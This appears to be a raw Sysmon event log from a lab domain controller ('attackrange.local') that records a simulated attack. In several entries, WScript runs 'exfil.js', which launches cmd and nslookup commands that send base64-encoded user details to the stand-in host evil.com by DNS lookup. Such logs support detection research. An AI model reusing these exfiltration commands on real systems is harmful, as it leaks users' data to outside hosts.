14:21:47.598{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.598{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.597{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.597{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D345-000000005F02}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.581{2E1864BB-18E0-629A-6742-000000005F02}39767832C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-D345-000000005F02}172C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.596{2E1864BB-18FB-629A-D345-000000005F02}172C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IERlZmF1bHRBY2NvdW50 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfse.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.581{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkc.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-18FB-629A-D145-000000005F02}6580968C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D245-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D245-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-18FB-629A-D045-000000005F02}7908652C:\Windows\system32\cmd.exe{2E1864BB-18FB-629A-D245-000000005F02}1368C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.571{2E1864BB-18FB-629A-D245-000000005F02}1368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FB-629A-D045-000000005F02}7908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkc.tmp 2>&1 23542300x8000000000000000214311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.566{2E1864BB-E1BD-6299-A700-000000005F02}4700NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=F02451D5004F3F8EE1323D37713A6495,SHA256=1E22678A825BCD45D36FFE43607119E4C58A3C82097E39288F3F63901C2778E1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.550{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-D145-000000005F02}6580C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.550{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FB-629A-D145-000000005F02}6580C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.550{2E1864BB-18FB-629A-D145-000000005F02}6580968C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-D045-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D145-000000005F02}6580C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214306Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214305Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214304Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214303Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214302Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FB-629A-D045-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214301Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.534{2E1864BB-18E0-629A-6742-000000005F02}39763336C:\Windows\System32\WScript.exe{2E1864BB-18FB-629A-D045-000000005F02}7908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214300Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.538{2E1864BB-18FB-629A-D045-000000005F02}7908C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfkc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214299Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.519{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlvvvkh.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214298Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.503{2E1864BB-18FB-629A-CE45-000000005F02}7840924C:\Windows\system32\conhost.exe{2E1864BB-18FB-629A-CF45-000000005F02}7284C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214297Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:47.503{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 